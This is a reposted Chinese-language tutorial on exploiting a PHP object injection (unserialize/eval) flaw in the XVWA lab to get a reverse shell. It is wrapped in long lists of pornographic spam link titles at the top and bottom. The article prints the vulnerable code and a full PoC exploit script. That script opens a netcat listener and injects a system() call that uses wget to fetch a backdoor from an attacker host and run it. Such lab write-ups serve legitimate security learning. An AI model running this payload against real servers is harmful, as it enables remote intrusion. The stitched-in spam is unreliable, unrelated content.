亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb

首頁 > 語言 > PHP > 正文

PHP序列化/對象注入漏洞分析

2024-05-04 23:45:05
字體:
來源:轉載
供稿:網友
這篇文章主要為大家詳細介紹了PHP序列化/對象注入漏洞分析,PHP序列化/對象注入漏洞的利用,感興趣的小伙伴們可以參考一下
 

本文是關于PHP序列化/對象注入漏洞分析的短篇,里面講述了如何獲取主機的遠程shell。

如果你想自行測試這個漏洞,你可以通過 XVWA 和 Kevgir 進行操作。

漏洞利用的第一步,我們開始測試目標應用是否存在PHP序列化。為了輔助測試,我們使用了Burpsuite的SuperSerial插件,下載地址在 這里 。它會被動檢測PHP和Java序列化的存在。

分析
我們檢測到了應用里使用了PHP序列化,所以我們可以開始確認應用代碼里是否含有遠程代碼執行漏洞。需要注意的是,序列化對象是從參數“r”取來的:

$var1=unserialize($_REQUEST['r']);
然后再進行反序列化和eval:

eval($this->inject);
接著,執行:

echo "<br/>".$var1[0]." - ".$var1[1];
有了這些,如果我們繞過了參數r的PHP序列化對象,那么就可以獲得代碼執行漏洞了!

< ?php   error_reporting(E_ALL);  class PHPObjectInjection{    public $inject;     function __construct(){     }     function __wakeup(){      if(isset($this->inject)){        eval($this->inject);      }    }  }//?r=a:2:{i:0;s:4:"XVWA";i:1;s:33:"XtremeVulnerable Web Application";}  if(isset($_REQUEST['r'])){      $var1=unserialize($_REQUEST['r']);         if(is_array($var1)){       echo "".$var1[0]." - ".$var1[1];    }  }else{    echo "parameter is missing";  }? >

漏洞利用
為了利用這個漏洞,我們創建了一個簡單的PHP腳本來自動生成PHP序列化payload,以及在目標遠程主機上運行我們想要的命令。然后,我創建了一個通用的PHP反彈shell,下載地址如下:

http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
注意: 你需要把這個文件傳到web服務器上,改動反彈shell腳本里面的本地ip和端口,以及下面的利用代碼:

<?php /*PHP Object Injection PoC Exploit by 1N3@CrowdShield - https://crowdshield.comA simple PoC to exploit PHP ObjectInjections flaws and gain remote shell access. Shouts to @jstnkndy @yappare for theassist!NOTE: This requireshttp://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gzsetup on a remote host with a connect back IP configured*/print"==============================================================================/r/n";print "PHP Object Injection PoCExploit by 1N3 @CrowdShield - https://crowdshield.com/r/n";print"==============================================================================/r/n";print "[+] Generating serializedpayload...[OK]/r/n";print "[+] Launching reverselistener...[OK]/r/n";system('gnome-terminal -x sh -c /'nc -lvvp1234/'');class PHPObjectInjection{  //CHANGE URL/FILENAME TO MATCH YOUR SETUP public $inject = "system('wget http://yourhost/phpobjbackdoor.txt-O phpobjbackdoor.php && php phpobjbackdoor.php');";} $url ='http://targeturl/xvwa/vulnerabilities/php_object_injection/?r='; // CHANGE TOTARGET URL/PARAMETER$url = $url . urlencode(serialize(newPHPObjectInjection));print "[+] Sendingexploit...[OK]/r/n";print "[+] Dropping down tointeractive shell...[OK]/r/n";print"==============================================================================/r/n";$response =file_get_contents("$url"); ? >

Demo
現在咱們的利用腳本已經就緒,我們可以執行它來得到遠程主機上的反彈shell,用來遠程執行命令!

以上就是本文的全部內容,希望對大家學習php程序設計有所幫助。



注:相關教程知識閱讀請移步到PHP教程頻道。
發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表

圖片精選

亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb
成人在线免费观看视视频| 久久精品成人一区二区三区| 欧美激情影音先锋| 欧美高清视频在线观看| 97视频免费在线观看| 一本色道久久88精品综合| 爽爽爽爽爽爽爽成人免费观看| 欧美高清视频免费观看| 久久久99久久精品女同性| 欧美理论电影在线播放| 欧美在线一区二区视频| 欧美xxxx14xxxxx性爽| 欧美精品在线播放| 国产精品黄页免费高清在线观看| 亚洲精品视频免费在线观看| 亚洲视频777| 精品激情国产视频| 日韩av在线免费播放| 欧美大成色www永久网站婷| 欧美俄罗斯性视频| 久久精品99国产精品酒店日本| 日韩资源在线观看| 91精品啪aⅴ在线观看国产| 国产不卡精品视男人的天堂| 亚洲一区二区三区sesese| 久久精视频免费在线久久完整在线看| 欧美日韩免费在线观看| 欧美主播福利视频| 亚洲成av人乱码色午夜| 欧美超级免费视 在线| 日韩美女免费观看| 欧美成人精品影院| 国产午夜精品美女视频明星a级| 亚洲欧美国产一区二区三区| 亚洲视频在线观看| 色偷偷88888欧美精品久久久| 国产精品 欧美在线| 在线日韩第一页| 精品久久国产精品| 欧美成人国产va精品日本一级| 精品日本高清在线播放| 91在线无精精品一区二区| 亚州av一区二区| 精品国产一区二区三区久久| 亚洲国产精品成人va在线观看| 久久黄色av网站| 在线成人激情视频| 91高潮在线观看| 欧美激情videos| 国产精品国产三级国产aⅴ浪潮| 亚洲永久在线观看| 国产精品白嫩美女在线观看| 日韩经典第一页| 亚洲人成绝费网站色www| 欧美限制级电影在线观看| 久久99久久99精品中文字幕| 亚洲欧美日本伦理| 911国产网站尤物在线观看| 久久国产一区二区三区| 97人人模人人爽人人喊中文字| 久久香蕉频线观| 狠狠躁18三区二区一区| 欧美黄色成人网| 亚洲社区在线观看| 国产精品影院在线观看| 成人激情视频免费在线| 日日摸夜夜添一区| 亚洲香蕉伊综合在人在线视看| 国产精品久久久久久五月尺| 欧美黑人xxxx| 日韩在线观看网址| 国产精品综合不卡av| 最近更新的2019中文字幕| 成人h视频在线| 精品亚洲永久免费精品| 亚洲欧美日韩在线高清直播| 日韩中文视频免费在线观看| 亚洲成人av片| 亚洲亚裔videos黑人hd| 免费91在线视频| 亚洲国产第一页| 亚洲图片欧美午夜| 欧美猛少妇色xxxxx| 欧美一级视频免费在线观看| 狠狠色噜噜狠狠狠狠97| 国产精品永久免费视频| 国产精品69精品一区二区三区| 亚洲国产精品久久精品怡红院| 午夜精品一区二区三区在线视| 亚洲一区二区三区777| 久久免费国产精品1| 九九久久综合网站| 国产视频丨精品|在线观看| 欧美亚洲另类激情另类| 色综合久久88色综合天天看泰| 91免费国产网站| 日韩欧美成人网| 欧美成人国产va精品日本一级| 国产精品久久久久久久久| 精品久久久久久| 亚洲人成欧美中文字幕| 日韩黄色高清视频| 色偷偷偷综合中文字幕;dd| 精品国产一区二区在线| 日韩av在线电影网| 欧美成人亚洲成人日韩成人| 欧美成人合集magnet| 日韩电影大片中文字幕| 亚洲女在线观看| 日韩欧美在线视频免费观看| 91免费在线视频| 亚洲美女视频网站| 国产一区二区三区直播精品电影| 国产成人在线一区二区| 国产97在线播放| 日产精品久久久一区二区福利| 中文字幕亚洲一区二区三区五十路| 日韩在线观看免费高清| 亚洲精品videossex少妇| 欧美疯狂做受xxxx高潮| 日韩精品免费观看| 欧美猛少妇色xxxxx| 亚洲色图激情小说| 国产精品自拍网| 成人在线激情视频| 亚洲图片欧美日产| 亚洲片在线资源| 高清欧美一区二区三区| 精品国产91久久久久久老师| 国产精品久久不能| 亚洲国模精品私拍| 色老头一区二区三区在线观看| 日韩av在线影院| 欧美大片免费看| 最近2019中文免费高清视频观看www99| 亚洲国产一区二区三区在线观看| 黑人精品xxx一区一二区| 伊人伊人伊人久久| 亚洲一区二区三区四区视频| 91在线视频九色| 欧美老女人在线视频| 成人免费看黄网站| 亚洲女人天堂色在线7777| 亚洲欧美综合精品久久成人| 亚洲欧美日韩久久久久久| 亚洲欧美另类国产| 日韩av电影在线网| 中文字幕亚洲第一| 亚洲影院色在线观看免费| 91精品久久久久久久久不口人| 97人人模人人爽人人喊中文字| 最近日韩中文字幕中文| 国产精品久久久久久久久久久新郎| 亚洲天堂免费视频| 国产自摸综合网| 亚洲激情国产精品| 国产成人a亚洲精品| 一区二区三区美女xx视频| 日韩中文字幕网站| 97视频免费在线观看| 欧美理论电影在线播放| 亚洲欧美精品伊人久久| 亚洲综合中文字幕在线观看| 日本一欧美一欧美一亚洲视频|